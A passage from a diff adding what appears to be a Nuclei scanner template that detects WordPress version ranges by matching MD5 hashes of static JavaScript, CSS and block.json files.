"(\"77e523fe8f66de596d646ebd6c3e8ca9\" == md5(body))" + - type: dsl 
+ name: 5.2 - 5.2.9 + dsl: + - "(\"495df404bcf10126197c0d6635ca9a07\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"ed967d411b4d74de9d0d6a6f586c74d3\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"7b007fb74b92764d1fc06ae511e66d06\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"ebefa1eab8a9bc27cf54d72ab0bb6c6d\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"543fde0978b47e7bdae1acd97bf054bc\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/deprecated.js" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"98bad6a83bd5da218b2d35691f497566\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"5de3b6d2f9eac464561dd8b54ed55cf7\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"762e5549e126269285769457c2bb3ddb\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"f1a701ab0a84540fc6bccca46aa242d2\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"18322782d09be581a034f3ab97243810\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"daad3a5aa907c98228160c9289660f55\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"c964eebe5839814c08c3fb26d951ca26\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/dom-ready.min.js" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"b5c1330c5b03e42ea6bcfa6df3fac8c4\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"b7059c3d8234362ea1acdf250099a7a9\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"ef19702e3c41e2b060de992a2bd2dd66\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"8825521d390213ffb919cafb95ca64e7\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"edd45ba6b7e8ecd18d3928e188372a32\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"0e5f0f7ec50672e362cfe3d619df3963\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - 
"(\"dfdcb2b3ede87acb1c69f68cc4e0ad5b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/wordcount.min.js" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"baee04dfe8fe19a1395c4764b3090e94\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"84adf32df85853051c4b4ff443579381\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"ec3e571129e51f249ba65f8510707637\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"1fbda7deaa611689cc829b97827de193\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"826c22d037cd314617169491f20321b6\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"bc24959774d006d11d22d9c30fef277f\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"e1880d9750e3d4598129644286fb579b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/escape-html.js" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"3d16ddce4596d2becd5a1600a222ad0f\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"1ed6a1ab0cb9e680c7e22fcdf23fc038\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"47aeb04222c3631c12d89f92f555c640\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"23cd8626f3e0d2006526f4c71b2deae5\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"db931b70025bb3f46d853926909e3d0d\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"153e7aebcae5f3708ce08c5300b87af1\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"486125227a8a0f2489d8214ddfc7e933\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/editor/editor-styles.min.css" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"6d86ff0ca33033ac9a036e21f0b0ea9e\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"6d969457c228c76ad1f8ecc9fddbedf4\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"6e1baf257d970da5013b5c5f3340ef3e\" == 
md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"4a98fa4de2c4af7e9ecfedfde88e80a1\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"1f30ad7edc4eb4beaf09a019f47f7e4f\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"7d3cd9c728b30fc554ac4c4eb7b9cda3\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"91db91761b326cc094a5a777078669d7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/editor/editor-styles-rtl.min.css" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"6d86ff0ca33033ac9a036e21f0b0ea9e\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"6d969457c228c76ad1f8ecc9fddbedf4\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"6e1baf257d970da5013b5c5f3340ef3e\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"4a98fa4de2c4af7e9ecfedfde88e80a1\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"e7cc458c8a91418a8907411c401d7639\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"9d08900a8ecb0ceea1b7ec671090a00d\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"98dfb074ec9260ec1db6560c43f3a3b6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/block-library/theme.min.css" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"bfa7dc8c1c5e86d37ba25252afe3602e\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"5ca26d4ea597b0f25b8477a5e344c89b\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"182ddba2abac4cdd9ffda9ac1e64e4b9\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"80145dc9e4908a34d14ca5a87d33c6d7\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"74f22f7553d243dff615e40cf7ec2230\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"9bd313fbce9688ed85c407ad4d0a7c13\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"fedc9311ebafd1704b6a71d3a5b3101a\" == md5(body))" + - method: GET 
+ path: + - "{{BaseURL}}/wp-includes/css/dist/block-library/theme-rtl.min.css" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"6d0ba66f6e7fcfdcba9bdaeb1dcad3c0\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"093a87e5f49cc3e10411d9a87bb36eb3\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"bb8862f82ae8dcdf5282216377ef773a\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"3eeaac647e4cd06679739d9554c96c86\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"a7692be7a7705e33788f67cce7f39207\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"3440f48f66bc6f461f0dfc60d98e5842\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"3ca7c8161a0b2f04d28e77f93d790c0a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/url.min.js" + matchers: + - type: dsl + name: 5.0 - 5.0.2 + dsl: + - "(\"123a422f86b67054286b77b4e0ea5d02\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.11 + dsl: + - "(\"4d6c78efb41747c864b4dc24c5c7f939\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"d4037f627561122928f7e7cc40f65f46\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"35acce22efd4f6d2f6f9475813822cd2\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"1d84b37530e4cc75fed81422d0f9b646\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"1f746ad199999bfaf7a396f2065f8e9c\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"52d4b4d3bc9a76cc7cb1b424070fb4bc\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"6f0f4cf71f4117e4889c02103129be92\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/hooks.js" + matchers: + - type: dsl + name: 5.0 - 5.0.2 + dsl: + - "(\"0c02dc3d6405f21e0e7ecba519a64e58\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.11 + dsl: + - "(\"d1495ca6445d4be01ea2c604ffad2c91\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - 
"(\"625c7a6a70d2656655dab6eb11d3bcab\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"23352b6c517082b20c00a8b7214f0b3b\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"6dff5d62e5015eb8cb03988ca4fcfeb0\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"c7a2e00fdaae21ee9c5481b3e56c095e\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"08b8807b992956f5597724f2e13784e1\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"74a454248e71b2fd42b694ddf167bfb8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/url.js" + matchers: + - type: dsl + name: 5.0 - 5.0.2 + dsl: + - "(\"c229754f4b3d48a28bd2b498a3888fd4\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.11 + dsl: + - "(\"026d66222af818d4aab9a2059165b064\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"5afa4e8668c3aaa88a476e3165b7d70f\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"74be87956d50685416bcf70b16b57785\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"edc8ad80ceb6b53aaf28e6610da3ca5b\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"769b16ac7a8892fb251c9f6c48c43fc4\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"34238cd53e89196494b742144a34ba0a\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"f66560251f29ae02c2f93ea50a58e9e1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/hooks.min.js" + matchers: + - type: dsl + name: 5.0 - 5.0.2 + dsl: + - "(\"a2b646c038a4717d8b1b5aca69c9670e\" == md5(body))" + - type: dsl + name: 5.0.3 - 5.0.11 + dsl: + - "(\"372901e50eb2d47eb24cb57a62aaa7f2\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"4e18512bfeb2e32f419cd82da8bfb799\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"d9fd81f370f535bb10e54ea7c42ef099\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"843d3122e1c99ce1e77ba5e67ad29de3\" == md5(body))" + - 
type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"37f5274faecba356e91142961b5c14ef\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"8646afb0a68683c9d04b87191415d34e\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"2464cde73ceddee1f4a34cf49c122b60\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/site-health.js" + matchers: + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"cfbfe6b77305e9f9d3e33fec6d32cb5f\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"37c6ab849b0abab3b2aec4f3f47f05a9\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"27504fbc4b0045d55cad6f3f2919d6b4\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"f803f97346bc19b891a2261dec8c48fc\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"dbc04a3e2f3db6cb48a8fb72f7ed5cec\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/site-health.min.js" + matchers: + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"496175569dcb05e5cb145c2b84abafc8\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"c999b140e1d7d2c45c7c70f6bbcb99e2\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"742d3d24998e12859938b2cc09176e2a\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"3d7752688d52db5e3cf0db77c35b9f2c\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"d47cf1b26ab79bd2b68f66c16fbc48d1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/priority-queue.min.js" + matchers: + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"ec4d6cdbbbcb33554355e37e60d780e4\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"517ae9e1dae4d245f2b071dad50bbb33\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"9f6335c2e10c8a11ec2f895cbd1b1af7\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"0b4c4c0dd3ccaa8f9fb79de4959a91fe\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"7c7f08d3d51daa67b5616c721d4ee200\" == 
md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/priority-queue.js" + matchers: + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"14abf08e7d04fcb87075c1648604a5a9\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"9ec356d434b7a09e112bf1c086b7bfb4\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"9d389c12bf9e0f25d6324d2226ca785f\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"cddf31c844ff08b4db7cef406b0346a9\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"b91af19e9e2df7d57b61c24f0100abfe\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/customize-base.js" + matchers: + - type: dsl + name: 4.7.4 - 4.8.15 + dsl: + - "(\"0cdc710a8f36181a0c701a3ce7e5997b\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.3 + dsl: + - "(\"8cade945b4a89d043762f80bcaed87aa\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"272674ffd71d5383e454ba023edc570c\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"161a6177aa359e2bc78e839ad6ee8d51\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"a1e0ef60b56dc0d59f03ff150c319f2b\" == md5(body))" + - type: dsl + name: 4.2 - 4.3.25 + dsl: + - "(\"5dca30a4679d1aedaacebd16a4a1a0ff\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"99408cfe66225d657d6bfe59611e4237\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"678187f7f110f020dcb64a0bcd62c9b8\" == md5(body))" + - type: dsl + name: 3.8 - 3.9.33 + dsl: + - "(\"aa275db98d31c41c3ea6b0a701b8a892\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"62f799465f3922f79057f8c1e17f123f\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"f435c162b8ac5353e9b9f92de1882cf8\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"44c9ce1c5ef5e1516a8bcc08f42931a2\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"811878a3509b308b50bc004360e5eec7\" == md5(body))" + - type: dsl + name: 
5.4 - 5.4.4 + dsl: + - "(\"6b9e78b6f87828a337c31e5f4d474795\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"d62e95f2aa34f1627648655ace1a1cfc\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"4365654cc960b21fc7bc03d2ac311b02\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/image-edit.js" + matchers: + - type: dsl + name: 4.8 - 4.9.4 + dsl: + - "(\"c8bd51029ca05bb65b49f80025b5fc5c\" == md5(body))" + - type: dsl + name: 4.6 - 4.7.19 + dsl: + - "(\"16a3cb26cb0814a231d58b38c97df814\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"6c814dd18a8c2eaab9ecb52ac319a85c\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"646b0f05bb16169872ac68c1087c0a90\" == md5(body))" + - type: dsl + name: 4.2 - 4.3.25 + dsl: + - "(\"c21931f1eecd6c1532a4c2ca7a7faa5e\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"f4da63e5c9c6e64e67d9662965af69d8\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"5701a93d854686d6a6f26f64216fe14f\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"aa560e6d9e2c20598fe08dda9bad82b3\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"abee7dc06e6c318e85deb3db101b518a\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"f2e5873b4cc923135fef4ebb4991e0ef\" == md5(body))" + - type: dsl + name: 3.3 - 3.4.2 + dsl: + - "(\"8d71200d96c8b58ccf6f2bb3a249ed95\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"6edbe79ea0c3df5123d2667feb05a36f\" == md5(body))" + - type: dsl + name: 2.9 - 3.1.4 + dsl: + - "(\"42df1d1f6cd6db258307ed95b60b9168\" == md5(body))" + - type: dsl + name: 4.9.5 - 5.0.11 + dsl: + - "(\"b6c28ba4d4b1419cb5cf936cc277f0f2\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"288062dd616078315bcefc5f3813462c\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"d05e5dcd5ec0b6f3573c77da40f6004c\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - 
"(\"f08b314e90861026d8db2654bf4ec6c6\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"b2f16bcb08802029cb7c4a3cc18c132c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/format-library/style-rtl.min.css" + matchers: + - type: dsl + name: 5.0 - 5.1.8 + dsl: + - "(\"0e7d5e83a110cada2dcbb79e0ebb5cf5\" == md5(body))" + - type: dsl + name: 5.2 - 5.3.6 + dsl: + - "(\"cf8bddec90a1c79917947c459e8768ce\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"5fc495995010c25fdaa23948992ff3ba\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"967f85719949bb31b665e4759cdb5c65\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"d7873eea88f51925f7931278b66c383f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/format-library/style.min.css" + matchers: + - type: dsl + name: 5.0 - 5.1.8 + dsl: + - "(\"0e7d5e83a110cada2dcbb79e0ebb5cf5\" == md5(body))" + - type: dsl + name: 5.2 - 5.3.6 + dsl: + - "(\"cf8bddec90a1c79917947c459e8768ce\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"f2902dc84667bd1b40b44b7640a460d0\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"b85c22e11453d8882434239e440bdf43\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"5624a5d450c4fc3b32a33bcc9e06fd83\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/tags-suggest.js" + matchers: + - type: dsl + name: 4.7.4 - 5.0.11 + dsl: + - "(\"e6b0ed85e26e70669c5715c7ad0f093e\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.3 + dsl: + - "(\"8be7404f47238690d2661ef0c1b03481\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"fc09cd4b84504470a8169de1fbe1846a\" == md5(body))" + - type: dsl + name: 5.2 - 5.3.6 + dsl: + - "(\"1e0f50a2947ccda6a1f9afbc3563b1d5\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"d25ce9bfcd49f45ea2ce2639f63a9c3f\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"b7c4d1698941cc299ec1b81ec26a80a9\" == 
md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"ab7f70969944f6ac429616610542932a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/warning.min.js" + matchers: + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"db84831d55cfdc51f2075773c00912a2\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"fa2ec0ed8220902d50cb63f6fee7366d\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"f4625750128afe29806e059d8bdfc89b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/primitives.min.js" + matchers: + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"b70293a44a87ef96f637a3ff1acfc953\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"2ddfbe528847785917cb8314634786d9\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"7982311ac531784ab798c99884ccdcde\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/keyboard-shortcuts.min.js" + matchers: + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"be47a44af031a2f1a43344b4a44b109d\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"0ad6c510e007f87d0a3bf8ad111377a5\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"02c511abc7b66279bb9215c9659984e2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/warning.js" + matchers: + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"1b2a453cfcaaff346039ed7f5ea57295\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"7fba13943ca2930a4e770b309a02cd2a\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"68b1863f629cb550f0fdb6d5620081c7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/block-directory.js" + matchers: + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"a8ec7b77bde5f5059dc94054b07cf6f4\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"4876f234deeedb192153d6293b0245d2\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"c7f462e97c803fceef094806d711a664\" == 
md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/primitives.js" + matchers: + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"5bf9f9a06b6d328e64e577074b404805\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"4e440209ae2331748dd08e417c3a7d59\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"1258f4c2c0ddc004a90ad76d4bb03032\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/keyboard-shortcuts.js" + matchers: + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"760c1b3492ab6365c275bfc2a77ae176\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"6ecee2ba7a57ae5437f6b9a8aa3e10dc\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"d8006549ce04ebfc622625a691c1abe1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/block-directory.min.js" + matchers: + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"d832c5cd8bd0da9512d8848863fa16ed\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"0e66af7f7e7dc0b76569010a26590e37\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"04dfad9a3e54344c9de5438d8afaac0c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/block-directory/style-rtl.min.css" + matchers: + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"09cf9b46feeca59fd0a9382bd232c4c8\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"ab529cd63991c549bc36ce30dd68c660\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"d9da8d9eb02483ddebcedf7644794705\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/block-directory/style.min.css" + matchers: + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"053280c146e2bf08a28230a29faad58f\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"1d7929892c1d4955c6183a758c28c48e\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"a720f09e5780bea0126c26f2c21082c7\" == md5(body))" + - method: GET + path: + - 
"{{BaseURL}}/wp-includes/blocks/social-link/block.json" + matchers: + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"6ea2b5c0ac1460e01ba67030b2a81180\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"1558f03f0a0dae63d39d2c69c71bb771\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"8c04a371745f9db987ec9a600d1308b7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/shortcode/block.json" + matchers: + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"e911185397e7871463ed951bbdaf1489\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"d78388efddb5da069353622bc5b0d7fb\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"fbc8238045192ff64ee68476f008a83a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/selectable.min.js" + matchers: + - type: dsl + name: 4.6 - 5.2.9 + dsl: + - "(\"b632add191ecae92e6a7b6b97212a640\" == md5(body))" + - type: dsl + name: 4.2 - 4.5.23 + dsl: + - "(\"51f19c22fb1d7b1bbf428b4de4f01fce\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"a61647fd50e892d148bf77fab886afd2\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"91167a07312f0c7cf9eadbb6211fa2d5\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"df30b5088b7511a63e4e3195c9667a88\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/menu.min.js" + matchers: + - type: dsl + name: 4.6 - 5.2.9 + dsl: + - "(\"c91cfff50715441295fe7463bb5d3894\" == md5(body))" + - type: dsl + name: 4.2 - 4.5.23 + dsl: + - "(\"279b59ffd3e6ed2da1397cb06ce13ec0\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"685fb2f73a372f615a6981a8cd1d2444\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"2bc433c534a14d09f1f8a2d060ebc7eb\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"d77da8d28a3e05fb5cbf9af4e4156f34\" == md5(body))" + - method: GET + 